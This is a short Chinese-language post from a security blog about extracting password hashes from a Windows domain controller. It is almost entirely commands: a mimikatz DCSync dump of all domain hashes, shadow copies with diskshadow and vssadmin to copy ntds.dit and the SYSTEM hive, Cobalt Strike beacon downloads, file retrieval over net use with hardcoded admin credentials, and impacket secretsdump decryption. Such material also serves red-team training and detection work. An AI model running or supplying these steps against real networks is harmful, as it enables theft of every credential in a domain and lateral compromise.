Windows域控导出Hash的几种方法

#mimikaz导入域内所有hash

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"

#利用diskshadow 之前需要先切换到 system32 目录下

diskshadow.exe 
set context persistent nowriters 
add volume c: alias stack 
create 
expose %stack% z: DISKSHADOW> exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit 
delete shadows all 
list shadows all 
reset DISKSHADOW> exit
reg save hklm\system c:\windows\temp\system.hive

 
beacon> download ntds.dit beacon> download system.hive beacon> downloads

#将两个文件从域控托回被控机

net use \\192.168.75.129\c$ /user:"yiwang\Administrator" "admin123"

move \\192.168.75.129\admin$\temp\ntds.dit c:\windows\temp\

move \\192.168.75.129\admin$\temp\system.hive c:\windows\temp\

net use * /del /yes 

#impacket中用 secretsdump.py脚本进行解密

python secretsdump.py -system system.hive -ntds ntds.dit LOCAL >>hash.txt

#vssadmin离线导入hash

vssadmin list shadows
vssadmin create shadow /for=c: 
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet 
esentutl /p /o c:\windows\temp\ntds.dit
reg save hklm\system c:\windows\temp\system.hive

参考:

https://xz.aliyun.com/t/2527#toc-1   

以上就是蓝域安全网为您分享的Windows域控导出Hash的几种方法,如果您喜欢记得转发+关注!

转载请带上本文链接:http://www.yemogege.cn/wzaq-stwz/391.html

版权保护: 本文由admin所发布,转载请保留本文链接: http://www.yemogege.cn/wzaq-stwz/391.html

免责声明:蓝域安全网所发布的一切渗透技术视频文章,逆向脱壳病毒分析教程,以及相关实用源码仅限用于学习和研究目的
请勿用于商业用途。如有侵权、不妥之处,请联系站长并出示版权证明以便删除! 

侵权删帖/违法举报/投稿等事物联系邮箱:yemogege@vip.qq.com 网站地图